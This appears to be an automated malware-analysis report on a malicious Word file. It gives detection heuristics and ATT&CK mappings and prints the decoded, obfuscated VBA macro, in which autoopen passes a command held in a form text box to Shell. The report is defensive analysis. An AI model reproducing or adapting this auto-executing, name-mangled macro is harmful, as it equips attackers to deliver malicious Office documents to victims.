MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'autoopen' macro is present and the 'Shell()' function is called, indicating an attempt to execute arbitrary commands. This is further supported by heuristics indicating suspicious cmd.exe invocation and VBA p-code execution.
Heuristics 9
-
ClamAV: Doc.Malware.Generic-6782702-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6782702-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
_ .Shell(oALJI, LvAUILAiisB), iHkRrQv) Set zUchnWRMDzuRujJPwVETjZnz = fCDzrtlLiLtXMiQ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() ZifucmS -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8626 bytes |
SHA-256: 3dbfdb64e298b3e84380fb49d26fbf49725581d562f7d89e1c02743846b9f020 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
232 of 276 identifiers look randomly generated (e.g. 'LTrkraKGLYPXuzSuMlMJSPdc') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "hnzhWjZcdibvb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
ZifucmS
End Sub
Attribute VB_Name = "GzXjaIqrqfcWn"
Function ZifucmS()
On Error Resume Next
Set CNkmDESYvqlZoWncihEAuzD = GrrYTfFNjnUsSrVF
Select Case EAdrqoJtOaFfazEJZjLNtEQl
Case 156759412
ABuJqMwEqzZTPDiiFEAiGoQ = tLJsCAksTznHwEksjVIGk
QIfPwLlpmMkLQiC = 45492296
qNhzSPafBTHBkf = wmvBMnBYGdKbXnnG
Case 280778363
TStCGwsFjzrdnCjbMdj = CByte(uOpoaVHoDsNNQc)
NQwjwJGDDhdpIuwaK = ChrW(qiEcEbkrECqkdNLlSK)
zmqnLlHzfwtHSCqaz = Log(kLUvFEEMTDQiXclJ)
End Select
Set aHaVolkErPrSzczbWHShPQad = SCASMXYMVMVWuIaGFvZl
Select Case WwjYiBoEiJjzoWijlisTFdP
Case 185194396
bzrbJVBrmwDQuiV = InCoYFlsXUQhSosjHTGBw
YofFCafSrAWizqNnjVNz = 26634163
FUZzDUIbXUniOOJSDLMEcQ = jrCWUmlnzZijLjFW
Case 68739565
PdCuSbwdOSCmzMoJ = CByte(GAwopmjqFjiwmzpCuNnIpY)
XqXSlKZVuBqzVLVaqWD = ChrW(vTfcUMkEzBBAhZbw)
TujfKkzwwTqZnwllK = Log(DKvwYaVVszpRwkXIXbXi)
End Select
Set ifbJwlGuVvBOicCXEYCTDE = cNCVFsjRkQwaiTDl
Select Case ziTQrivoEUEMzMi
Case 165985188
wwvQABoiQwlCTEBntT = luliGjBYcEnDNBOUGp
zhimakKmkPDZDsNnZMSojzd = 84078745
duYBEkuzBUoGILtwuQI = fjKANpHoAJzDRNwqmkj
Case 206141901
bCYYhRBZsojUotu = CByte(XoPcFwrVkovOCKJkdPEhm)
fYGPIUQjdTCHOwRDDiK = ChrW(osWmWhiwqYpNwv)
qVqoXEALbMuvNTa = Log(aWinnCTsapRsEipL)
End Select
Set ujYYTWqHCAQsLjmwajhUPIq = iSBNantBEtWIdXXLjZdCSt
Select Case BiEzuLkdltipBUdh
Case 101335840
OnRKdSDMVkqfnWp = AiWpzpUPkOuhWrF
OvDFvqAluiqznGGMAwTuLZI = 166465422
CZPXWpifzQsSjJJikv = zVciIijaXLjonimtQ
Case 246868981
YsLUopNtRmKMairZ = CByte(avGppPHTScFnzPtwWWYnAnou)
PnNwFJvEoSVfYidEAVNIGT = ChrW(RPDHTmzmGLAacuVMSJ)
JzXRwoviASbmivQvjCBcS = Log(jOTYHBKiIuwWKatwFTYDwTf)
End Select
Set HvZswDQuZQrjLGHo = FKTsaJjnEkiVjuiCNzWUW
Select Case nwwjXukRJqGCIAkUjltEsSm
Case 166865944
WNdwGkTNKWXurmmDmbnOhl = SsTkbRCVJZsBjHTCFnpz
NaozHBFrzKJkkLFnAsvI = 10278459
VwkFwTYibrnzESik = QwiKOjQwvOPEutpczF
Case 276101072
BFmSQjRzkGmIPYfLX = CByte(GOTIAEJdhwwWFN)
VSKKLufSTMpbGpVOdFwwav = ChrW(FhJmBSwOBZTuGUBLJbwAvKc)
oLjVRIONZYFcBH = Log(zVwoCnuPubtnXivzuEHw)
End Select
Const LvAUILAiisB = 0
Set zKSmfOcGLfbzCtIqnXMiHdIP = JhYIBjOhYlRHGNlHdYUi
Select Case qWjhwEfkrUCCFWjD
Case 325639317
wNPiHrjjKbWiEolW = KraCciwhRPFBrEDfN
RuMPpwStDOMPOQjDVM = 148605403
ViTwqbdfSXSwqSU = GvCcjifiUCBoRnirJFA
Case 256145005
PZNUmajvOYvwHwaKuYm = CByte(kbnapNfobplRhAqWoHzIwnGd)
rJqIhOhNnqnlnfY = ChrW(sUYniOHFDVmbiAzVJUzDofta)
EtJCkAcYMGThqb = Log(CkELcFintSbThVHMaziZ)
End Select
Set MTDltwkEPjSJoPzNzlD = sMzVorjvFMzFAHhj
Select Case IzlXzsUPcCCCDu
Case 204367535
zhzViwBSowDjNIjhQLq = SnuUcGMoisBRUdCaiNTMz
iwpkBTVVmrDtIKmfs = 182570091
NnwzlPjGGzCsiozEwfsFs = JGKOaVrnCVrbkfmBDU
Case 116879616
PWkzZFJGpzAWruiq = CByte(XpOOSwhBCEURvbXnfDmVKp)
MkzCUUkqAwNjfDwwZC = ChrW(WAoptYdjMqrUchTCdVtMjSOU)
hurkjGNSMSUXvDirlX = Log(IclwMAVbjpREmTVMdlzjkiBP)
End Select
Set FJwvbTzWVJjDCiwvdkD = OEYZNqVpCwkhPv
Select Case HiNwuRljqBNXdUSvkMEJBlX
Case 229404180
wJUYZznGnpQPlJncUhXzT = UjAzUKmtVGiOwHQKQCZQpiB
wDRhjDAjQGolYZicUtUJ = 246920932
MfLKRUZDBqiUARtENR = vzqSflrXwwwJrub
Case 280116441
VVmfJNEwCEYNjPjCCqZWN = CByte(YZzcGFjqZZaHjribmklT)
hSJNjPHoECTXpwMhjGwS = ChrW(izmbjpYbEokuCrHn)
ZqZBVXGjtuSuFinBQ = Log(TWlAZjNANidmFF)
End Select
Set APQdmGrCWoSImjFtjJMSj = wzZkLlNHTGmUFZwWCrnG
Select Case EZiHhZkArrSBUSTDCvFpO
Case 137679033
VRafwJHUidvsYqdi = dHbPTTlGcSzwiRVj
NpGtnqkWoYYavNZQ = 300810631
HtwBwoYUqIYwMZJK = nXSpQrsfvMjhFafoFOqR
Case 78027906
SUSzczsLwRljmtbWqCDWDcs = CByte(lhtHHLTsRvFzXQOvmjNOvW)
mNiXnOpopcfOuElEnwsSqn = ChrW(wanHkTOirOuGuYoficGP)
rCUqBiaQDDzwikzAGF = Log(awnzAzqjzTOqjXIHYS)
End Select
oALJI = hnzhWjZcdibvb.TextBox1 + oNoLzILo + XWmpXDC + KzazoNNa + ZipWflk + DpfsIoqT + lDVwYYs + zzjhlL + iAHDmENR + ERIwuPs
Set ZMpavCwFzbLwnzTwvdj = QVzjuljZHPWsKbucHLSJVw
Select Case EHFiwbobwjAKDNJfJT
Case 148519610
jESoMErpjLWUUBuYpDlwToZJ = RrOwjJqwwlAoRWtk
slMfqCSkqGhYivfJiuNcqDBj = 144900882
QujYjrNUwoziaowNpC = aUpUfmbfHIojjJU
Case 250902814
ARZqKKzrMAUYjdNzXvB = CByte(ZElFLGMHEQUGCYMYcSQ)
pdTlHGbiakIOTLww = ChrW(UiEwrmvjNWIQpWFfrlwk)
zFihjTIGmraPrH = Log(LLzqYFtkTNlOCicaCMfXZZ)
End Select
Set lPzmwAlTFNzPNjCRNKzldChk = haPlNaGIFUIMia
Select Case aRJYzXKFcAsbPB
Case 145641136
iNmPZVhrnqHHLuFjjtKMt = ndWUnlVwrGjmazr
dFjSkGPCtiuJsVrJ = 270719507
ZItFivVpzBYZTGrXPFc = XjNUbErLGVPZzAZiRYW
Case 264765063
vHOiUOoSUFljOCtvZddEKidl = CByte(bTjIFriodbYwpHqCtmPdtiwf)
sutjmNicfsuHJOOCslaVwj = ChrW(nBQwNIFtUBUNwpEqOu)
KOvvjYBaBzYKqJYFiW = Log(QUazaFpBSNnvLaaYI)
End Select
Set RbNwZosVPmBdUqujHNSI = tiEaONLraiYojwawnq
Select Case XtMCsZSjJuHzjmIYwJWKbjdp
Case 26338836
pktTkUWVkbjcMAwhCzT = sCbYdpRjVqPXwPkhmpJna
BjrTzVNtifVSjnJV = 275213884
CqAuMIiwQPvNnjKiBujKsvS = LjCfjzYQzOkkKGUjpAF
Case 330253977
QrpHAlOpfCGXYicFzPTriNZv = CByte(YvawVrqUcvrMXfLJbUL)
MlXrdqklGUDSthcqnsKL = ChrW(DwnksbkHhDtNROnXj)
fGENIrZTqDVWiJANJ = Log(jHlOAiYRJEcTpSEafELpnv)
End Select
Set wsiwMimZqhwPNlllMVk = zsZSDjtOmGMoLimzrmlR
Select Case tvVwcOZqwhUMKaESPs
Case 207562806
XmkUHEjwmtajTFGwETbRT = qYsbBDhjctGjzGLBrX
aEDHktFUHOwRNRAwLcfC = 208117274
GQjdnFzlCcDmtTnRH = vjaRjcsOzKzYLVzJzmaHG
Case 339103066
VMTNaYhJuVzHwqpkEl = CByte(GpmiQimjVBqAbwPEEMP)
qSAFDONDSIBWWisij = ChrW(DiooLIDVVKhlkYpTiooja)
UjQMzTitDkVWIk = Log(BGsBisDWjYchCzEqCHAJ)
End Select
Set lEXLrzHbkhqlCwCNKHRlXjdt = wEkkwjUAaXOzkzvLiQ
Select Case dDGIEvpttIaBbdousWqoA
Case 141322866
baoNZIVZtSvPSpwjoGnbs = VmWwEDonchISfi
iQkYihjjNVFwqChMu = 297796595
EBrdDSlFqNHAKNPGqCC = TmGIazGwluUNZDdP
Case 284999962
hGzbsSGVuiavrKrjISuiCD = CByte(nTvstaGkAPCVwMrt)
CFEXXqDKWpvLUIkduJIzaM = ChrW(owZjoouXRYHjwznPdshXlKY)
GSsCCiwNpLQYzJOWbSim = Log(coiGtiFspIdZtaWw)
End Select
Set LTrkraKGLYPXuzSuMlMJSPdc = hjuHQfUZipMtJEtswOwtlQS
Select Case kobDwiwpPsJrPwutvwQH
Case 39894504
CjTRVBjiGRQQWc = QaztWiRvBdwTDz
zLXjlukhIuJjlsbwbSpiYQ = 95763781
WklRnXhdkTRFtnqJfsrwN = jCaiWBNSOjwoMAJSulNfvRbW
Case 33113987
cjwjZQVZEirIAjPRFhIEap = CByte(NwGkhCPbEZiZhT)
KjSnwablkhPdMtNAOmflh = ChrW(fnWoGniSHizWXcmmsZ)
MVDRYDiqZTmBiArAiRITnC = Log(ahfpVkOctFzVzbVzl)
End Select
Set AvNqiOSjtLFSBlwAjWnmi = vJcTJXXpPPwSTGaEcPA
Select Case UkTZWcudvWbMBZA
Case 26007817
PFvLDvqVjSpabtXl = HKqDwjcuutnjQtGWrMK
wQpcDmKEDUcDabR = 277639962
KSYSRJCClTYjDkhN = iqUNAKWYqZQkJobQIjtl
Case 253529522
GmaRSlUzkvquwbVAJICu = CByte(jlSciwTvDnctAjinjrk)
qpVuOsAuIXljsC = ChrW(BHonoBEjHNAwrnNaQR)
kuPYOmvYnjCsBzMjfuDvCmJ = Log(jOvJHuwURARcmjaB)
End Select
zIjrcHw = Array(NQEqji, frKRMkoXm, tzuSPHb, Interaction _
_
_
_
_
_
_
_
.Shell(oALJI, LvAUILAiisB), iHkRrQv)
Set zUchnWRMDzuRujJPwVETjZnz = fCDzrtlLiLtXMiQ
Select Case RHKWJiQljUNbXP
Case 172951747
dZIUOMMFIFPYQrjmoRPS = dwwmSPWfJnPkMunawnEv
NDSsUrkanGAIEAb = 78603416
wwpZzRAnDzwMsdKXXPudu = YmFVhOcIuMOOqHFfNmREQuoO
Case 308983579
qkjkjinzYDUdkmKvDkwi = CByte(CRrCIMpjiwqbFYrbKfjarj)
LkBftVrDPQpoTp = ChrW(XWzTuFdCfOTTsFSDvSPjS)
jwLnubKPjYmcHKc = Log(pzihWRaBwwzNtVEIPRp)
End Select
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.